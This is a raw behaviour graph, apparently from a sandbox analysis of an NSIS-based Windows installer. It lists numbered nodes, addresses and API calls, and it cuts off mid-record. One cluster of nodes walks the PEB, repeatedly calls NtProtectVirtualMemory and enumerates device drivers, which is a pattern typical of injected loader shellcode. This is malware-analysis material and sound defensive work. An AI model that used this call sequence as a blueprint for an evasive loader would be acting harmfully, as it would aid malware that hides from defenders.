8397->8400 8401 40533d lstrcatW 8398->8401 8398->8402 8399->8402 8403 40535f SendMessageW SendMessageW SendMessageW 8399->8403 8400->8399 8401->8397 8404 405867 CreateProcessW 8402->8404 8403->8402 8405 401f16 8404->8405 8406 40589a CloseHandle 8404->8406 8405->8379 8405->8383 8407 40670d WaitForSingleObject 8405->8407 8406->8405 8408 406727 8407->8408 8409 406739 GetExitCodeProcess 8408->8409 8455 406698 8408->8455 8409->8382 8412->8379 8428 4062b1 8413->8428 8414 4064fc 8415 402c64 8414->8415 8446 406282 lstrcpynW 8414->8446 8415->8391 8430 406516 8415->8430 8417 4064ca lstrlenW 8417->8428 8418 4062a4 10 API calls 8418->8417 8421 4063df GetSystemDirectoryW 8421->8428 8423 4063f2 GetWindowsDirectoryW 8423->8428 8424 406516 5 API calls 8424->8428 8425 4062a4 10 API calls 8425->8428 8426 40646d lstrcatW 8426->8428 8427 406426 SHGetSpecialFolderLocation 8427->8428 8429 40643e SHGetPathFromIDListW CoTaskMemFree 8427->8429 8428->8414 8428->8417 8428->8418 8428->8421 8428->8423 8428->8424 8428->8425 8428->8426 8428->8427 8439 406150 8428->8439 8444 4061c9 wsprintfW 8428->8444 8445 406282 lstrcpynW 8428->8445 8429->8428 8436 406523 8430->8436 8431 406599 8432 40659e CharPrevW 8431->8432 8434 4065bf 8431->8434 8432->8431 8433 40658c CharNextW 8433->8431 8433->8436 8434->8391 8436->8431 8436->8433 8437 406578 CharNextW 8436->8437 8438 406587 CharNextW 8436->8438 8451 405b80 8436->8451 8437->8436 8438->8433 8447 4060ef 8439->8447 8442 4061b4 8442->8428 8443 406184 RegQueryValueExW RegCloseKey 8443->8442 8444->8428 8445->8428 8446->8415 8448 4060fe 8447->8448 8449 406102 8448->8449 8450 406107 RegOpenKeyExW 8448->8450 8449->8442 8449->8443 8450->8449 8452 405b86 8451->8452 8453 405b9c 8452->8453 8454 405b8d CharNextW 8452->8454 8453->8436 8454->8452 8456 4066b5 PeekMessageW 8455->8456 8457 4066c5 WaitForSingleObject 8456->8457 8458 4066ab DispatchMessageW 8456->8458 8457->8408 8458->8456 9652 401000 9653 401037 BeginPaint GetClientRect 9652->9653 9654 40100c DefWindowProcW 9652->9654 9656 4010f3 9653->9656 9657 401179 9654->9657 9658 401073 CreateBrushIndirect FillRect DeleteObject 9656->9658 9659 4010fc 9656->9659 9658->9656 9660 401102 CreateFontIndirectW 9659->9660 9661 401167 EndPaint 9659->9661 9660->9661 9662 401112 6 API calls 9660->9662 9661->9657 9662->9661 10109 401503 10110 40150b 10109->10110 10112 40151e 10109->10112 10111 402c15 17 API calls 10110->10111 10111->10112 8671 402306 8672 402314 8671->8672 8673 40230e 8671->8673 8675 402322 8672->8675 8676 402c37 17 API calls 8672->8676 8674 402c37 17 API calls 8673->8674 8674->8672 8677 402c37 17 API calls 8675->8677 8679 402330 8675->8679 8676->8675 8677->8679 8678 402c37 17 API calls 8680 402339 WritePrivateProfileStringW 8678->8680 8679->8678 10113 40190c 10114 401943 10113->10114 10115 402c37 17 API calls 10114->10115 10116 401948 10115->10116 10117 405990 67 API calls 10116->10117 10118 401951 10117->10118 10119 401d0e 10120 402c15 17 API calls 10119->10120 10121 401d15 10120->10121 10122 402c15 17 API calls 10121->10122 10123 401d21 GetDlgItem 10122->10123 10124 40258c 10123->10124 9663 1000164f 9664 10001516 GlobalFree 9663->9664 9666 10001667 9664->9666 9665 100016ad GlobalFree 9666->9665 9667 10001682 9666->9667 9668 10001699 VirtualFree 9666->9668 9667->9665 9668->9665 10125 40190f 10126 402c37 17 API calls 10125->10126 10127 401916 10126->10127 10128 4058e4 MessageBoxIndirectW 10127->10128 10129 40191f 10128->10129 9669 2b692e3 9670 2b692e6 9669->9670 9671 2b6927f 9669->9671 9672 2b86193 K32EnumDeviceDrivers 9671->9672 9673 2b6352f 9672->9673 8717 2b632e0 8721 2b83d61 8717->8721 8719 2b63284 8719->8717 8720 2b632f2 8719->8720 8722 2b83d72 8721->8722 8723 2b83dfc GetPEB 8722->8723 8737 2b84f02 8723->8737 8725 2b8486c 8725->8719 8726 2b83ea8 8726->8725 8727 2b8486f 8726->8727 8732 2b8435e 8726->8732 8730 2b84ca1 8727->8730 8733 2b849b0 8727->8733 8736 2b6352f 8727->8736 8728 2b84f02 NtProtectVirtualMemory 8729 2b84ee8 8728->8729 8729->8719 8730->8728 8730->8736 8731 2b84f02 NtProtectVirtualMemory 8731->8725 8732->8731 8732->8736 8734 2b84f02 NtProtectVirtualMemory 8733->8734 8733->8736 8735 2b84c9b 8734->8735 8735->8719 8736->8719 8736->8736 8738 2b84fa9 NtProtectVirtualMemory 8737->8738 8738->8726 9674 10001058 9676 10001074 9674->9676 9675 100010dd 9676->9675 9677 10001516 GlobalFree 9676->9677 9678 10001092 9676->9678 9677->9678 9679 10001516 GlobalFree 9678->9679 9680 100010a2 9679->9680 9681 100010b2 9680->9681 9682 100010a9 GlobalSize 9680->9682 9683 100010b6 GlobalAlloc 9681->9683 9684 100010c7 9681->9684 9682->9681 9685 1000153d 3 API calls 9683->9685 9686 100010d2 GlobalFree 9684->9686 9685->9684 9686->9675 8744 401c19 8745 402c15 17 API calls 8744->8745 8746 401c20 8745->8746 8747 402c15 17 API calls 8746->8747 8748 401c2d 8747->8748 8749 402c37 17 API calls 8748->8749 8750 401c42 8748->8750 8749->8750 8753 402c37 17 API calls 8750->8753 8754 401c52 8750->8754 8751 401ca9 8756 402c37 17 API calls 8751->8756 8752 401c5d 8755 402c15 17 API calls 8752->8755 8753->8754 8754->8751 8754->8752 8757 401c62 8755->8757 8758 401cae 8756->8758 8759 402c15 17 API calls 8757->8759 8760 402c37 17 API calls 8758->8760 8761 401c6e 8759->8761 8762 401cb7 FindWindowExW 8760->8762 8763 401c99 SendMessageW 8761->8763 8764 401c7b SendMessageTimeoutW 8761->8764 8765 401cd9 8762->8765 8763->8765 8764->8765 9687 2b692ec 9688 2b69342 9687->9688 9689 2b692f0 9687->9689 9690 2b86193 K32EnumDeviceDrivers 9688->9690 9691 2b6352f 9688->9691 9690->9691 8807 2b62ded 8808 2b62df2 8807->8808 8811 2b80196 8808->8811 8810 2b62e39 8812 2b801a8 8811->8812 8814 2b6352f 8812->8814 8817 2b804ed 8812->8817 8814->8810 8815 2b802ec 8815->8814 8816 2b804ed CreateFileA 8815->8816 8816->8814 8818 2b8057b 8817->8818 8819 2b80768 CreateFileA 8818->8819 8820 2b6352f 8818->8820 8819->8815 8819->8820 8820->8815 8820->8820 9692 40281b 9693 402821 9692->9693 9694 402829 FindClose 9693->9694 9695 402abf 9693->9695 9694->9695 9696 405425 9697 405446 GetDlgItem GetDlgItem GetDlgItem 9696->9697 9698 4055cf 9696->9698 9741 40424c SendMessageW 9697->9741 9700 4055d8 GetDlgItem CreateThread CloseHandle 9698->9700 9703 405600 9698->9703 9700->9703 9701 4054b6 9708 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 9701->9708 9702 40562b 9706 40568b 9702->9706 9710 405665 ShowWindow 9702->9710 9711 40563f 9702->9711 9703->9702 9704 405650 9703->9704 9705 405617 ShowWindow ShowWindow 9703->9705 9707 40427e 8 API calls 9704->9707 9743 40424c SendMessageW 9705->9743 9706->9704 9717 405699 SendMessageW 9706->9717 9712 40565e 9707->9712 9715 40552b 9708->9715 9716 40550f SendMessageW SendMessageW 9708->9716 9713 405685 9710->9713 9714 405677 9710->9714 9718 4041f0 SendMessageW 9711->9718 9720 4041f0 SendMessageW 9713->9720 9719 4052e6 24 API calls 9714->9719 9721 405530 SendMessageW 9715->9721 9722 40553e 9715->9722 9716->9715 9717->9712 9723 4056b2 CreatePopupMenu 9717->9723 9718->9704 9719->9713 9720->9706 9721->9722 9725 404217 18 API calls 9722->9725 9724 4062a4 17 API calls 9723->9724 9726 4056c2 AppendMenuW 9724->9726 9727 40554e 9725->9727 9728 4056f2 TrackPopupMenu 9726->9728 9729 4056df GetWindowRect 9726->9729 9730 405557 ShowWindow 9727->9730 9731 40558b GetDlgItem SendMessageW 9727->9731 9728->9712 9732 40570d 9728->9732 9729->9728 9733 40557a 9730->9733 9734 40556d ShowWindow 9730->9734 9731->9712 9735 4055b2 SendMessageW SendMessageW 9731->9735 9736 405729 SendMessageW 9732->9736 9742 40424c SendMessageW 9733->9742 9734->9733 9735->9712 9736->9736 9737 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 9736->9737 9739 40576b SendMessageW 9737->9739 9739->9739 9740 405794 GlobalUnlock SetClipboardData CloseClipboard 9739->9740 9740->9712 9741->9701 9742->9731 9743->9702 9744 2b64ad0 9745 2b6477e 9744->9745 9745->9744 9746 2b64be4 9745->9746 9748 2b71135 9745->9748 9750 2b7109f 9748->9750 9749 2b71149 GetPEB 9752 2b7115e 9749->9752 9750->9748 9750->9749 9751 2b71035 9750->9751 9751->9746 10134 40432b lstrcpynW lstrlenW 8985 40202c 8986 40203e 8985->8986 8996 4020f0 8985->8996 8987 402c37 17 API calls 8986->8987 8989 402045 8987->8989 8988 401423 24 API calls 8994 40224a 8988->8994 8990 402c37 17 API calls 8989->8990 8991 40204e 8990->8991 8992 402064 LoadLibraryExW 8991->8992 8993 402056 GetModuleHandleW 8991->8993 8995 402075 8992->8995 8992->8996 8993->8992 8993->8995 9008 4066cb WideCharToMultiByte 8995->9008 8996->8988 8999 402086 9001 4020a5 8999->9001 9002 40208e 8999->9002 9000 4020bf 9003 4052e6 24 API calls 9000->9003 9011 10001759 9001->9011 9004 401423 24 API calls 9002->9004 9005 402096 9003->9005 9004->9005 9005->8994 9006 4020e2 FreeLibrary 9005->9006 9006->8994 9009 4066f5 GetProcAddress 9008->9009 9010 402080 9008->9010 9009->9010 9010->8999 9010->9000 9012 10001789 9011->9012 9053 10001b18 9012->9053 9014 10001790 9015 100018a6 9014->9015 9016 100017a1 9014->9016 9017 100017a8 9014->9017 9015->9005 9101 10002286 9016->9101 9085 100022d0 9017->9085 9022 1000180c 9026 10001812 9022->9026 9027 1000184e 9022->9027 9023 100017ee 9114 100024a4 9023->9114 9024 100017d7 9036 100017cd 9024->9036 9111 10002b57 9024->9111 9025 100017be 9029 100017c4 9025->9029 9035 100017cf 9025->9035 9031 100015b4 3 API calls 9026->9031 9033 100024a4 10 API calls 9027->9033 9029->9036 9095 1000289c 9029->9095 9038 10001828 9031->9038 9039 10001840 9033->9039 9034 100017f4 9125 100015b4 9034->9125 9105 10002640 9035->9105 9036->9022 9036->9023 9043 100024a4 10 API calls 9038->9043 9045 10001895 9039->9045 9136 10002467 9039->9136 9042 100017d5 9042->9036 9043->9039 9045->9015 9047 1000189f GlobalFree 9045->9047 9047->9015 9050 10001881 9050->9045 9140 1000153d wsprintfW 9050->9140 9051 1000187a FreeLibrary 9051->9050 9143 1000121b GlobalAlloc 9053->9143 9055 10001b3c 9144 1000121b GlobalAlloc 9055->9144 9057 10001d7a GlobalFree GlobalFree GlobalFree 9058 10001d97 9057->9058 9072 10001de1 9057->9072 9059 100020ee 9058->9059 9067 10001dac 9058->9067 9058->9072 9061 10002110 GetModuleHandleW 9059->9061 9059->9072 9060 10001c1d GlobalAlloc 9082 10001b47 9060->9082 9062 10002121 LoadLibraryW 9061->9062 9063 10002136 9061->9063 9062->9063 9062->9072 9151 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 9063->9151 9064 10001c68 lstrcpyW 9068 10001c72 lstrcpyW 9064->9068 9065 10001c86 GlobalFree 9065->9082 9067->9072 9147 1000122c 9067->9147 9068->9082 9069 10002188 9071 10002195 lstrlenW 9069->9071 9069->9072 9152 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 9071->9152 9072->9014 9073 10002148 9073->9069 9084 10002172 GetProcAddress 9073->9084 9074 10002048 9074->9072 9077 10002090 lstrcpyW 9074->9077 9077->9072 9078 10001cc4 9078->9082 9145 1000158f GlobalSize GlobalAlloc 9078->9145 9079 10001f37 GlobalFree 9079->9082 9080 100021af 9080->9072 9082->9057 9082->9060 9082->9064 9082->9065 9082->9068 9082->9072 9082->9074 9082->9078 9082->9079 9083 1000122c 2 API calls 9082->9083 9150 1000121b GlobalAlloc 9082->9150 9083->9082 9084->9069 9093 100022e8 9085->9093 9087 10002410 GlobalFree 9090 100017ae 9087->9090 9087->9093 9088 100023ba GlobalAlloc CLSIDFromString 9088->9087 9089 1000238f GlobalAlloc WideCharToMultiByte 9089->9087 9090->9024 9090->9025 9090->9036 9091 1000122c GlobalAlloc lstrcpynW 9091->9093 9092 100023d9 9092->9087 9158 100025d4 9092->9158 9093->9087 9093->9088 9093->9089 9093->9091 9093->9092 9154 100012ba 9093->9154 9097 100028ae 9095->9097 9096 10002953 SetFilePointer 9098 10002971 9096->9098 9097->9096 9099 10002a62 GetLastError 9098->9099 9100 10002a6d 9098->9100 9099->9100 9100->9036 9102 10002296 9101->9102 9103 100017a7 9101->9103 9102->9103 9104 100022a8 GlobalAlloc 9102->9104 9103->9017 9104->9102 9108 1000265c 9105->9108 9106 100026c0 9109 100026cf 9106->9109 9110 100026c5 GlobalSize 9106->9110 9107 100026ad GlobalAlloc 9107->9109 9108->9106 9108->9107 9109->9042 9110->9109 9113 10002b62 9111->9113 9112 10002ba2 GlobalFree 9113->9112 9161 1000121b GlobalAlloc 9114->9161 9116 10002506 MultiByteToWideChar 9119 100024ae 9116->9119 9117 1000252b StringFromGUID2 9117->9119 9118 1000253c lstrcpynW 9118->9119 9119->9116 9119->9117 9119->9118 9120 1000254f wsprintfW 9119->9120 9121 1000256c GlobalFree 9119->9121 9122 100025a7 GlobalFree 9119->9122 9123 10001272 2 API calls 9119->9123 9162 100012e1 9119->9162 9120->9119 9121->9119 9122->9034 9123->9119 9166 1000121b GlobalAlloc 9125->9166 9127 100015ba 9128 100015c7 lstrcpyW 9127->9128 9130 100015e1 9127->9130 9131 100015fb 9128->9131 9130->9131 9132 100015e6 wsprintfW 9130->9132 9133 10001272 9131->9133 9132->9131 9134 100012b5 GlobalFree 9133->9134 9135 1000127b GlobalAlloc lstrcpynW 9133->9135 9134->9039 9135->9134 9137 10001861 9136->9137 9138 10002475 9136->9138 9137->9050 9137->9051 9138->9137 9139 10002491 GlobalFree 9138->9139 9139->9138 9141 10001272 2 API calls 9140->9141 9142 1000155e 9141->9142 9142->9045 9143->9055 9144->9082 9146 100015ad 9145->9146 9146->9078 9153 1000121b GlobalAlloc 9147->9153 9149 1000123b lstrcpynW 9149->9072 9150->9082 9151->9073 9152->9080 9153->9149 9155 100012c1 9154->9155 9156 1000122c 2 API calls 9155->9156 9157 100012df 9156->9157 9157->9093 9159 100025e2 VirtualAlloc 9158->9159 9160 10002638 9158->9160 9159->9160 9160->9092 9161->9119 9163 100012ea 9162->9163 9164 1000130c 9162->9164 9163->9164 9165 100012f0 lstrcpyW 9163->9165 9164->9119 9165->9164 9166->9127 9753 2b676d9 9754 2b67789 9753->9754 9755 2b86193 K32EnumDeviceDrivers 9754->9755 9756 2b67796 9755->9756 9757 2b86193 K32EnumDeviceDrivers 9756->9757 9758 2b677b8 9757->9758 9759 402a2f 9760 402c15 17 API calls 9759->9760 9761 402a35 9760->9761 9762 402a47 9761->9762 9763 402a6c 9761->9763 9764 402885 9761->9764 9762->9764 9767 4061c9 wsprintfW 9762->9767 9763->9764 9765 4062a4 17 API calls 9763->9765 9765->9764 9767->9764 9768 401a30 9769 402c37 17 API calls 9768->9769 9770 401a39 ExpandEnvironmentStringsW 9769->9770 9771 401a60 9770->9771 9772 401a4d 9770->9772 9772->9771 9773 401a52 lstrcmpW 9772->9773 9773->9771 9774 402835 9775 40283d 9774->9775 9776 402841 FindNextFileW 9775->9776 9777 402853 9775->9777 9776->9777 9778 4029e0 9777->9778 9780 406282 lstrcpynW 9777->9780 9780->9778 10135 401735 10136 402c37 17 API calls 10135->10136 10137 40173c SearchPathW 10136->10137 10138 4029e0 10137->10138 10139 401757 10137->10139 10139->10138 10141 406282 lstrcpynW 10139->10141 10141->10138 9781 10002a77 9782 10002a8f 9781->9782 9783 1000158f 2 API calls 9782->9783 9784 10002aaa 9783->9784 9789 404a3c 9790 404a68 9789->9790 9791 404a4c 9789->9791 9792 404a9b 9790->9792 9793 404a6e SHGetPathFromIDListW 9790->9793 9800 4058c8 GetDlgItemTextW 9791->9800 9795 404a85 SendMessageW 9793->9795 9796 404a7e 9793->9796 9795->9792 9798 40140b 2 API calls 9796->9798 9797 404a59 SendMessageW 9797->9790 9798->9795 9800->9797 9474 403d3e 9475 403e91 9474->9475 9476 403d56 9474->9476 9478 403ea2 GetDlgItem GetDlgItem 9475->9478 9479 403ee2 9475->9479 9476->9475 9477 403d62 9476->9477 9481 403d80 9477->9481 9482 403d6d SetWindowPos 9477->9482 9483 404217 18 API calls 9478->9483 9480 403f3c 9479->9480 9491 401389 2 API calls 9479->9491 9485 404263 SendMessageW 9480->9485 9507 403e8c 9480->9507 9486 403d85 ShowWindow 9481->9486 9487 403d9d 9481->9487 9482->9481 9484 403ecc SetClassLongW 9483->9484 9488 40140b 2 API calls 9484->9488 9502 403f4e 9485->9502 9486->9487 9489 403da5 DestroyWindow 9487->9489 9490 403dbf 9487->9490 9488->9479 9492 4041c1 9489->9492 9493 403dc4 SetWindowLongW 9490->9493 9494 403dd5 9490->9494 9495 403f14 9491->9495 9501 4041d1 ShowWindow 9492->9501 9492->9507 9493->9507 9497 403de1 GetDlgItem 9494->9497 9498 403e7e 9494->9498 9495->9480 9499 403f18 SendMessageW 9495->9499 9496 4041a2 DestroyWindow EndDialog 9496->9492 9503 403e11 9497->9503 9504 403df4 SendMessageW IsWindowEnabled 9497->9504 9505 40427e 8 API calls 9498->9505 9499->9507 9500 40140b 2 API calls 9500->9502 9501->9507 9502->9496 9502->9500 9506 4062a4 17 API calls 9502->9506 9502->9507 9510 404217 18 API calls 9502->9510 9520 404217 18 API calls 9502->9520 9536 4040e2 DestroyWindow 9502->9536 9508 403e1e 9503->9508 9511 403e65 SendMessageW 9503->9511 9512 403e31 9503->9512 9518 403e16 9503->9518 9504->9503 9504->9507 9505->9507 9506->9502 9508->9511 9508->9518 9510->9502 9511->9498 9514 403e39 9512->9514 9515 403e4e 9512->9515 9513 403e4c 9513->9498 9517 40140b 2 API calls 9514->9517 9516 40140b 2 API calls 9515->9516 9519 403e55 9516->9519 9517->9518 9549 4041f0 9518->9549 9519->9498 9519->9518 9521 403fc9 GetDlgItem 9520->9521 9522 403fe6 ShowWindow KiUserCallbackDispatcher 9521->9522 9523 403fde 9521->9523 9546 404239 EnableWindow 9522->9546 9523->9522 9525 404010 EnableWindow 9530 404024 9525->9530 9526 404029 GetSystemMenu EnableMenuItem SendMessageW 9527 404059 SendMessageW 9526->9527 9526->9530 9527->9530 9529 403d1f 18 API calls 9529->9530 9530->9526 9530->9529 9547 40424c SendMessageW 9530->9547 9548 406282 lstrcpynW 9530->9548 9532 404088 lstrlenW 9533 4062a4 17 API calls 9532->9533 9534 40409e SetWindowTextW 9533->9534 9535 401389 2 API calls 9534->9535 9535->9502 9536->9492 9537 4040fc CreateDialogParamW 9536->9537 9537->9492 9538 40412f 9537->9538 9539 404217 18 API calls 9538->9539 9540 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 9539->9540 9541 401389 2 API calls 9540->9541 9542 404180 9541->9542 9542->9507 9543 404188 ShowWindow 9542->9543 9544 404263 SendMessageW 9543->9544 9545 4041a0 9544->9545 9545->9492 9546->9525 9547->9530 9548->9532 9550 4041f7 9549->9550 9551 4041fd SendMessageW 9549->9551 9550->9551 9551->9513 8590 4015c1 8591 402c37 17 API calls 8590->8591 8592 4015c8 8591->8592 8593 405bfe 4 API calls 8592->8593 8606 4015d1 8593->8606 8594 401631 8596 401663 8594->8596 8597 401636 8594->8597 8595 405b80 CharNextW 8595->8606 8600 401423 24 API calls 8596->8600 8617 401423 8597->8617 8605 40165b 8600->8605 8604 40164a SetCurrentDirectoryW 8604->8605 8606->8594 8606->8595 8607 401617 GetFileAttributesW 8606->8607 8609 40584f 8606->8609 8612 4057b5 CreateDirectoryW 8606->8612 8621 405832 CreateDirectoryW 8606->8621 8607->8606 8624 40665c GetModuleHandleA 8609->8624 8613 405802 8612->8613 8614 405806 GetLastError 8612->8614 8613->8606 8614->8613 8615 405815 SetFileSecurityW 8614->8615 8615->8613 8616 40582b GetLastError 8615->8616 8616->8613 8618 4052e6 24 API calls 8617->8618 8619 401431 8618->8619 8620 406282 lstrcpynW 8619->8620 8620->8604 8622 405842 8621->8622 8623 405846 GetLastError 8621->8623 8622->8606 8623->8622 8625 406682 GetProcAddress 8624->8625 8626 406678 8624->8626 8627 405856 8625->8627 8630 4065ec GetSystemDirectoryW 8626->8630 8627->8606 8629 40667e 8629->8625 8629->8627 8631 40660e wsprintfW LoadLibraryExW 8630->8631 8631->8629 9804 4016cc 9805 402c37 17 API calls 9804->9805 9806 4016d2 GetFullPathNameW 9805->9806 9807 40170e 9806->9807 9808 4016ec 9806->9808 9809 401723 GetShortPathNameW 9807->9809 9810 402abf 9807->9810 9808->9807 9811 4065c5 2 API calls 9808->9811 9809->9810 9812 4016fe 9811->9812 9812->9807 9814 406282 lstrcpynW 9812->9814 9814->9807 8739 4014d7 8740 402c15 17 API calls 8739->8740 8741 4014dd Sleep 8740->8741 8743 402abf 8741->8743 9815 4022d7 9816 4022de 9815->9816 9819 4022f1 9815->9819 9817 4062a4 17 API calls 9816->9817 9818 4022eb 9817->9818 9818->9819 9820 4058e4 MessageBoxIndirectW 9818->9820 9820->9819 10148 402dd7 10149 402e02 10148->10149 10150 402de9 SetTimer 10148->10150 10151 402e57 10149->10151 10152 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 10149->10152 10150->10149 10152->10151 10153 2b64721 10155 2b6475c 10153->10155 10154 2b647e3 10155->10154 10156 2b71135 GetPEB 10155->10156 10156->10154 8831 4023de 8832 402c37 17 API calls 8831->8832 8833 4023f0 8832->8833 8834 402c37 17 API calls 8833->8834 8835 4023fa 8834->8835 8848 402cc7 8835->8848 8838 402432 8840 40243e 8838->8840 8842 402c15 17 API calls 8838->8842 8839 402c37 17 API calls 8841 402428 lstrlenW 8839->8841 8843 40245d RegSetValueExW 8840->8843 8852 4030fa 8840->8852 8841->8838 8842->8840 8845 402473 RegCloseKey 8843->8845 8847 402885 8845->8847 8849 402ce2 8848->8849 8872 40611d 8849->8872 8854 403113 8852->8854 8853 403141 8876 403315 8853->8876 8854->8853 8879 40332b SetFilePointer 8854->8879 8858 4032ae 8861 4032f0 8858->8861 8864 4032b2 8858->8864 8859 40315e GetTickCount 8860 403298 8859->8860 8868 4031ad 8859->8868 8860->8843 8863 403315 ReadFile 8861->8863 8862 403315 ReadFile 8862->8868 8863->8860 8864->8860 8865 403315 ReadFile 8864->8865 8866 405e26 WriteFile 8864->8866 8865->8864 8866->8864 8867 403203 GetTickCount 8867->8868 8868->8860 8868->8862 8868->8867 8869 403228 MulDiv wsprintfW 8868->8869 8871 405e26 WriteFile 8868->8871 8870 4052e6 24 API calls 8869->8870 8870->8868 8871->8868 8873 40612c 8872->8873 8874 40240a 8873->8874 8875 406137 RegCreateKeyExW 8873->8875 8874->8838 8874->8839 8874->8847 8875->8874 8877 405df7 ReadFile 8876->8877 8878 40314c 8877->8878 8878->8858 8878->8859 8878->8860 8879->8853 10157 2b66d12 10158 2b66d27 GetPEB 10157->10158 10159 2b6352f 10157->10159 10158->10159 9821 4046e6 9822 404712 9821->9822 9823 404723 9821->9823 9882 4058c8 GetDlgItemTextW 9822->9882 9825 40472f GetDlgItem 9823->9825 9831 40478e 9823->9831 9828 404743 9825->9828 9826 404872 9832 404a21 9826->9832 9884 4058c8 GetDlgItemTextW 9826->9884 9827 40471d 9829 406516 5 API calls 9827->9829 9830 404757 SetWindowTextW 9828->9830 9834 405bfe 4 API calls 9828->9834 9829->9823 9835 404217 18 API calls 9830->9835 9831->9826 9831->9832 9836 4062a4 17 API calls 9831->9836 9838 40427e 8 API calls 9832->9838 9840 40474d 9834->9840 9841 404773 9835->9841 9842 404802 SHBrowseForFolderW 9836->9842 9837 4048a2 9843 405c5b 18 API calls 9837->9843 9839 404a35 9838->9839 9840->9830 9847 405b53 3 API calls 9840->9847 9844 404217 18 API calls 9841->9844 9842->9826 9845 40481a CoTaskMemFree 9842->9845 9846 4048a8 9843->9846 9848 404781 9844->9848 9849 405b53 3 API calls 9845->9849 9885 406282 lstrcpynW 9846->9885 9847->9830 9883 40424c SendMessageW 9848->9883 9851 404827 9849->9851 9854 40485e SetDlgItemTextW 9851->9854 9858 4062a4 17 API calls 9851->9858 9853 404787 9856 40665c 5 API calls 9853->9856 9854->9826 9855 4048bf 9857 40665c 5 API calls 9855->9857 9856->9831 9864 4048c6 9857->9864 9859 404846 lstrcmpiW 9858->9859 9859->9854 9862 404857 lstrcatW 9859->9862 9860 404907 9886 406282 lstrcpynW 9860->9886 9862->9854 9863 40490e 9865 405bfe 4 API calls 9863->9865 9864->9860 9868 405b9f 2 API calls 9864->9868 9870 40495f 9864->9870 9866 404914 GetDiskFreeSpaceW 9865->9866 9869 404938 MulDiv 9866->9869 9866->9870 9868->9864 9869->9870 9871 4049d0 9870->9871 9873 404b6b 20 API calls 9870->9873 9872 4049f3 9871->9872 9874 40140b 2 API calls 9871->9874 9887 404239 EnableWindow 9872->9887 9875 4049bd 9873->9875 9874->9872 9877 4049d2 SetDlgItemTextW 9875->9877 9878 4049c2 9875->9878 9877->9871 9880 404aa2 20 API calls 9878->9880 9879 404a0f 9879->9832 9888 40463f 9879->9888 9880->9871 9882->9827 9883->9853 9884->9837 9885->9855 9886->9863 9887->9879 9889 404652 SendMessageW 9888->9889 9890 40464d 9888->9890 9889->9832 9890->9889 8970 4027e9 8971 4027f0 8970->8971 8973 402a6a 8970->8973 8972 402c15 17 API calls 8971->8972 8974 4027f7 8972->8974 8975 402806 SetFilePointer 8974->8975 8975->8973 8976 402816 8975->8976 8978 4061c9 wsprintfW 8976->8978 8978->8973 9891 100018a9 9892 100018cc 9891->9892 9893 10001911 9892->9893 9894 100018ff GlobalFree 9892->9894 9895 10001272 2 API calls 9893->9895 9894->9893 9896 10001a87 GlobalFree GlobalFree 9895->9896 9897 401ced 9898 402c15 17 API calls 9897->9898 9899 401cf3 IsWindow 9898->9899 9900 401a20 9899->9900 9212 4024f2 9213 402c77 17 API calls 9212->9213 9214 4024fc 9213->9214 9215 402c15 17 API calls 9214->9215 9216 402505 9215->9216 9217 402885 9216->9217 9218 402521 RegEnumKeyW 9216->9218 9219 40252d RegEnumValueW 9216->9219 9220 402542 RegCloseKey 9218->9220 9219->9220 9220->9217 10160 2b69302 10161 2b86193 K32EnumDeviceDrivers 10160->10161 10162 2b6352f 10160->10162 10161->10162 9905 4014f5 SetForegroundWindow 9906 402abf 9905->9906 9907 100016b6 9908 100016e5 9907->9908 9909 10001b18 22 API calls 9908->9909 9910 100016ec 9909->9910 9911 100016f3 9910->9911 9912 100016ff 9910->9912 9913 10001272 2 API calls 9911->9913 9914 10001726 9912->9914 9915 10001709 9912->9915 9918 100016fd 9913->9918 9916 10001750 9914->9916 9917 1000172c 9914->9917 9919 1000153d 3 API calls 9915->9919 9921 1000153d 3 API calls 9916->9921 9920 100015b4 3 API calls 9917->9920 9922 1000170e 9919->9922 9923 10001731 9920->9923 9921->9918 9924 100015b4 3 API calls 9922->9924 9926 10001272 2 API calls 9923->9926 9925 10001714 9924->9925 9927 10001272 2 API calls 9925->9927 9928 10001737 GlobalFree 9926->9928 9929 1000171a GlobalFree 9927->9929 9928->9918 9930 1000174b GlobalFree 9928->9930 9929->9918 9930->9918 9931 4020fe 9932 402c37 17 API calls 9931->9932 9933 402105 9932->9933 9934 402c37 17 API calls 9933->9934 9935 40210f 9934->9935 9936 402c37 17 API calls 9935->9936 9937 402119 9936->9937 9938 402c37 17 API calls 9937->9938 9939 402123 9938->9939 9940 402c37 17 API calls 9939->9940 9941 40212d 9940->9941 9942 40216c CoCreateInstance 9941->9942 9943 402c37 17 API calls 9941->9943 9946 40218b 9942->9946 9943->9942 9944 401423 24 API calls 9945 40224a 9944->9945 9946->9944 9946->9945 10163 4019ff 10164 402c37 17 API calls 10163->10164 10165 401a06 10164->10165 10166 402c37 17 API calls 10165->10166 10167 401a0f 10166->10167 10168 401a16 lstrcmpiW 10167->10168 10169 401a28 lstrcmpW 10167->10169 10170 401a1c 10168->10170 10169->10170 10171 2b64b77 10172 2b6477e 10171->10172 10173 2b71135 GetPEB 10172->10173 10174 2b64be4 10172->10174 10173->10174 8633 100027c2 8634 10002812 8633->8634 8635 100027d2 VirtualProtect 8633->8635 8635->8634 10175 401f86 10176 402c37 17 API calls 10175->10176 10177 401f8d 10176->10177 10178 40665c 5 API calls 10177->10178 10179 401f9c 10178->10179 10180 401fb8 GlobalAlloc 10179->10180 10189 402020 10179->10189 10181 401fcc 10180->10181 10180->10189 10182 40665c 5 API calls 10181->10182 10183 401fd3 10182->10183 10184 40665c 5 API calls 10183->10184 10185 401fdd 10184->10185 10185->10189 10190 4061c9 wsprintfW 10185->10190 10187 402012 10191 4061c9 wsprintfW 10187->10191 10190->10187 10191->10189 8681 402388 8682 402390 8681->8682 8683 4023bb 8681->8683 8693 402c77 8682->8693 8684 402c37 17 API calls 8683->8684 8686 4023c2 8684->8686 8698 402cf5 8686->8698 8689 4023a1 8690 402c37 17 API calls 8689->8690 8691 4023a8 RegDeleteValueW RegCloseKey 8690->8691 8692 4023cf 8691->8692 8694 402c37 17 API calls 8693->8694 8695 402c8e 8694->8695 8696 4060ef RegOpenKeyExW 8695->8696 8697 402397 8696->8697 8697->8689 8697->8692 8699 402d0b 8698->8699 8701 402d21 8699->8701 8702 